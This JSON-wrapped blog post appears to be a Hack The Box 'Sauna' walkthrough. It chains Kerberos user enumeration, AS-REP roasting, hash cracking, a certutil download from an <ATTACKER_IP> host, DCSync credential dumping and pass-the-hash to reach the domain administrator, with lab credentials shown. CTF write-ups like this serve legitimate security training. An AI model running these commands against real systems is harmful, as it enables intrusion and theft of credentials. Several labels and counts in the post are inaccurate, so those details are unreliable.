{
"$type": "site.standard.document",
"bskyPostRef": {
"cid": "bafyreieknljckr6wjx2urbaqdahcgsrqoescn37sfbetbogrebnwm6bboe",
"uri": "at://did:plc:25rdn5elo5izoxrmtis34zuk/app.bsky.feed.post/3mpt7xabzor32"
},
"coverImage": {
"$type": "blob",
"ref": {
"$link": "bafkreig2ml7l4mfek7n4qfdq5of6yvf3dciv3r4ce7giyncpyv4ygwez4a"
},
"mimeType": "image/webp",
"size": 101898
},
"path": "/iftikhar_911/sauna-ctf-htb-1lp0",
"publishedAt": "2026-07-04T13:29:19.000Z",
"site": "https://dev.to",
"tags": [
"ctf",
"redteam",
"cybersecurity",
"@10",
"https://setuptools.pypa.io/en/latest/pkg_resources.html",
"@ropnop"
],
"textContent": "Hi what’s up, welcome to my page. Today we are going to solve Sauna ctf in Hack The box. This ctf is about Active Directory, which is very important.\n\n**Enumeration**\n`nmap -sV -sC 10.129.95.180\nStarting Nmap 7.98 ( https://nmap.org ) at 2026–07–03 13:16 -0400\nNmap scan report for 10.129.95.180\nHost is up (0.21s latency).\nNot shown: 987 filtered tcp ports (no-response)\nPORT STATE SERVICE VERSION\n53/tcp open domain Simple DNS Plus\n80/tcp open http Microsoft IIS httpd 10.0\n|_http-server-header: Microsoft-IIS/10.0\n|_http-title: Egotistical Bank :: Home\n| http-methods:\n|_ Potentially risky methods: TRACE\n88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026–07–04 00:16:58Z)\n135/tcp open msrpc Microsoft Windows RPC\n139/tcp open netbios-ssn Microsoft Windows netbios-ssn\n389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)\n445/tcp open microsoft-ds?\n464/tcp open kpasswd5?\n593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0\n636/tcp open tcpwrapped\n3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)\n3269/tcp open tcpwrapped\n5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)\n|_http-server-header: Microsoft-HTTPAPI/2.0\n|_http-title: Not Found\nService Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows\nHost script results:\n| smb2-time:\n| date: 2026–07–04T00:17:20\n|_ start_date: N/A\n|_clock-skew: 6h59m50s\n| smb2-security-mode:\n| 3.1.1:\n|_ Message signing enabled and required`\nAs we can see, we have LDAP, evil-winrm, smb,http, rpc and many more ports.\n\n**RPC port**\n\n`rpcclient -U \"\" -N 10.129.95.180\nrpcclient $> enumdomusers\nresult was NT_STATUS_ACCESS_DENIED\nrpcclient $> ^C`\nWe can’t use rpc port without authentication.\n\n**SMB port**\n\n\n\n `smbclient -L //10.129.95.180\n Password for [WORKGROUP\\root]:\n Anonymous login successful\n Sharename Type Comment\n - - - - - - - - - - -\n Reconnecting with SMB1 for workgroup listing.\n do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\n Unable to connect with SMB1 - no workgroup available`\n\n\nSame thing.\n\n**LDAP**\nWe have port 88 and 636. That’s why we can use ldapsearch for domain enumeration. Let’s start it.\n\n\n\n `ldapsearch -x -H ldap://10.129.95.180 -s base -b \"\" \"(objectClass=*)\" namingContexts\n # extended LDIF\n # extended LDIF\n #\n # LDAPv3\n # base <> with scope baseObject\n # filter: (objectClass=*)\n # requesting: namingContexts\n #\n\n #\n dn:\n namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL\n namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL\n namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL\n namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL\n namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL\n\n # search result\n search: 2\n result: 0 Success\n\n # numResponses: 2\n # numEntries: 1`\n\n\nDomain Controller- egotistical-bank.local. And there are no interesting things.\n\n**KERBEROS**\nPort 88 is active, we can use kerbrute tool for enumerate authenticated users. I’m using seclist for usernames but you can use any userlist txt.\n\n\n\n ./kerbrute userenum -d egotistical-bank.local --dc 10.129.95.180 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt\n\n __ __ __\n / /_____ _____/ /_ _______ __/ /____\n / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\\n / ,< / __/ / / /_/ / / / /_/ / /_/ __/\n /_/|_|\\___/_/ /_.___/_/ \\__,_/\\__/\\___/\n\n Version: v1.0.3 (9dad6e1) - 07/03/26 - Ronnie Flathers @ropnop\n\n 2026/07/03 13:31:29 > Using KDC(s):\n 2026/07/03 13:31:29 > 10.129.95.180:88\n\n 2026/07/03 13:32:09 > [+] VALID USERNAME: administrator@egotistical-bank.local\n 2026/07/03 13:35:45 > [+] VALID USERNAME: hsmith@egotistical-bank.local\n 2026/07/03 13:36:30 > [+] VALID USERNAME: Administrator@egotistical-bank.local\n 2026/07/03 13:38:47 > [+] VALID USERNAME: fsmith@egotistical-bank.local\n 2026/07/03 13:58:42 > [+] VALID USERNAME: Fsmith@egotistical-bank.local\n\n\nWe found 3 users.\n\n**AES-ROASTING**\nFor these users, we can use impacket script called GetNPUusers.py. This script allowed us to find hashes.\n\n\n\n GetNPUsers.py 'egotistical-bank.local/' -usersfile /home/kali/Downloads/sauna.txt -format hashcat -outputfile saunaasrep.txt -dc-ip 10.129.95.180\n /usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html\n __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetNPUsers.py')\n Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies\n\n [-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set\n [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set\n $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd\n\n\nWe got fsmith’s hash.\n\n**Cracking the hash**\nHashcat help us to crack this hash.\n\n`hashcat -m 18200 saunaasrep.txt /usr/share/wordlists/rockyou.txt --force\n$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd:Thestrokes23`\nWe found fsmith’s password.\n\n**Gaining access to evil-winrm | PORT 5985**\n\n\n\n evil-winrm -i <ip> -u <username> -p <password>\n\n evil-winrm -i 10.129.95.180 -u fsmith -p Thestrokes23\n\n Evil-WinRM shell v3.9\n\n\n\n Info: Establishing connection to remote endpoint\n *Evil-WinRM* PS C:\\Users\\FSmith> cd Desktop\n *Evil-WinRM* PS C:\\Users\\FSmith\\Desktop> dir\n\n\n Directory: C:\\Users\\FSmith\\Desktop\n\n\n Mode LastWriteTime Length Name\n ---- ------------- ------ ----\n -ar--- 7/3/2026 5:14 PM 34 user.txt\n\n\n\n *Evil-WinRM* PS C:\\Users\\FSmith\\Desktop> type user.txt\n *******\n\n\nWe got user.txt in desktop directory.\n\n**Privilege Escalation**\nFirstly,we should upload winpeas on the victim machine for privilege escalation methods.\n\nOn attacker machine\n\nMake sure you are supposed to be in directory which has winpeas inside.\n\n`python3 -m http.server 80`\nOn victim machine\n\n`certutil -urlcache -split -f http://<ATTACKER_IP>:80/winPEAS.exe winPEAS.exe`\nWe can run winpeas with .\\winpeas.exe\n\n\n\n Looking for AutoLogon credentials\n Some AutoLogon credentials were found\n DefaultDomainName : EGOTISTICALBANK\n DefaultUserName : EGOTISTICALBANK\\svc_loanmanager\n DefaultPassword : Moneymakestheworldgoround!\n\n\nAnd there it is autologon user:svc_loanmanager\n\n**BloodHound**\n\nTake a look at bloodhound,and we can understood what loanmanager can do. loanmanager have 3 permissions: GetChangesAll, DCSync, GetChanges.\n\nWe use secretsdump for administrator hash.\n\n`\n\n```console\n`console\n`secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'\n/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html\n**import**('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'secretsdump.py')\nImpacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies\n\n[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied\n[_] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\n[_] Using the DRSUAPI method to get NTDS.DIT secrets\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::\n```\n\n```\nHash has been found but firstly we should make sure that we can login with this hash. So we use crackmapexec for prove.\n\n`crackmapexec smb 10.129.95.180 -u 'Administrator' --hash aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e\nSMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)\nSMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\\Administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)\n`Yeppp, we can use this hash for login!\n\n**ROOT FLAG**\n\n`>`impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -dc-ip 10.129.95.180 Administrator@10.129.95.180\n\n> C:\\Users> cd Administrator\n>\n> C:\\Users\\Administrator> cd Desktop\n>\n> C:\\Users\\Administrator\\Desktop> dir\n> Volume in drive C has no label.\n> Volume Serial Number is 489C-D8FC\n> Directory of C:\\Users\\Administrator\\Desktop\n> 07/14/2021 03:35 PM\n>\n> .\n> 07/14/2021 03:35 PM ..\n> 07/03/2026 05:14 PM 34 root.txt\n> 1 File(s) 34 bytes\n> 2 Dir(s) 7,812,263,936 bytes free\n> C:\\Users\\Administrator\\Desktop> type root.txt\n> *********``\n> BINGOOO!!!! We got root flag. Stay safe and goodbye.",
"title": "Sauna CTF HTB"
}